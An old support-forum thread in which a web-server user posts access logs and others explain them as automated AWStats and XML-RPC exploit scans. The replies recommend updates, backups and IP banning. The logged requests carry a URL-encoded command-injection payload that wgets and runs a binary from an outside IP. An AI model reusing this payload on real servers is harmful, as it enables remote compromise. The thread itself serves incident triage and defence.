| View previous topic :: View next topic |
| Author |
Message |
Bell-chan
-
Joined: 09 Nov 2005
Posts: 8
|
 Posted: Wed Nov 09, 2005 1:11 pm Post subject: strange log-entries |
 |
|
Hi!
I've been using the Abyss Web Server X1 for about a month now and since yesterday there are some strange log-entries appearing:
| Code: | 80.22.51.242 - - [08/Nov/2005:19:53:19 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:20 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:22 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:23 +0100] "POST /xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:24 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:25 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:26 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:28 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:29 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:30 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:31 +0100] "POST /xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:32 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
80.22.51.242 - - [08/Nov/2005:19:53:33 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)" |
What do they mean? To me it looks as if someone is trying to hack my system. If that is the case, do I need to take any precautions?
cu
Bell-chan |
|
| Back to top |
   |
 |
Anonymoose
-
Joined: 09 Sep 2003
Posts: 2192
|
| Posted: Wed Nov 09, 2005 1:31 pm Post subject: |
|
|
They are hacking attempts, but not necessarily from individuals - possibly automated sweeps by worms etc.
You have nothing to worry about from those entries - the first is for an AWStats exploit, the second is the newly discovered PHP/XML-RPC exploits. If you look at the response code as shown in your logs (404) it shows that the file was not found, so the request was worthless. If it makes you feel better, you can ban the IP's, but I have a feeling you'll be seeing a lot of the XML-RPC scans soon as the new worm does the rounds :(
Example :
80.22.51.242 - - [08/Nov/2005:19:53:23 +0100] "POST /xmlrpc.php HTTP/1.1" 404 234 "" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
As always, make sure all your installed server side software - PHP, bulletin boards etc is up to date, and that you have valid backups of forum databases etc. Other than that, sit tight.
_________________
"Invent an idiot proof webserver and they'll invent a better idiot..." |
|
| Back to top |
|
|
aprelium
-
Joined: 22 Mar 2002
Posts: 6800
|
| Posted: Thu Nov 10, 2005 10:56 am Post subject: Re: strange log-entries |
|
|
Bell-chan,
We confirm Anonymoose's answer. These attacks have not affected you.
By the way, if your bandwidth is precious, you can turn on Antihacking in Console > Server Configuration. This will detect such attacks and ban automatically their originating IPs.
_________________
Support Team
Aprelium - http://www.aprelium.com |
|
| Back to top |
 |
|
Bell-chan
-
Joined: 09 Nov 2005
Posts: 8
|
| Posted: Thu Nov 10, 2005 3:08 pm Post subject: |
|
|
Thank you for the quick answers!
As I don't use PHP/Pearl/etc. it seems that I don't have to be afraid of anything. ;-) So all I have to do is keep Abyss up-to-date which I'm already doing. Also thanks for the advice with the "Anti-Hacking Protection". I've turned it on and am waiting for the next hacking attempt to see what happens.
cu
Bell-chan |
|
| Back to top |
|
|
kev1952
-
Joined: 08 Sep 2005
Posts: 105
Location: Townsville Australia
|
| Posted: Mon Nov 28, 2005 11:19 am Post subject: |
|
|
| Thanks for the information here folks! I have had this "attack" today and did notice that the server withstood it very well. The docs for the "auto anti-hacking", whilst sensible, are a little brief. After reading this thread I've turned it on as an experiment and left the default settings as they are except for the "banning duration" which I've set to 7200 (2hrs). Is this correct or should I approach it in a different way? |
|
| Back to top |
|
|
Anonymoose
-
Joined: 09 Sep 2003
Posts: 2192
|
| Posted: Mon Nov 28, 2005 11:57 am Post subject: |
|
|
Starting out as you have is sensible. If you notice the same IP's reoffending after the 2 hour ban is up, consider increasing it...
_________________
"Invent an idiot proof webserver and they'll invent a better idiot..." |
|
| Back to top |
|
|
kev1952
-
Joined: 08 Sep 2005
Posts: 105
Location: Townsville Australia
|
| Posted: Mon Nov 28, 2005 12:10 pm Post subject: |
|
|
| Thanks for that - I just wanted to make sure I understood what I was doing. Will keep your advice in mind. |
|
| Back to top |
|
|
|
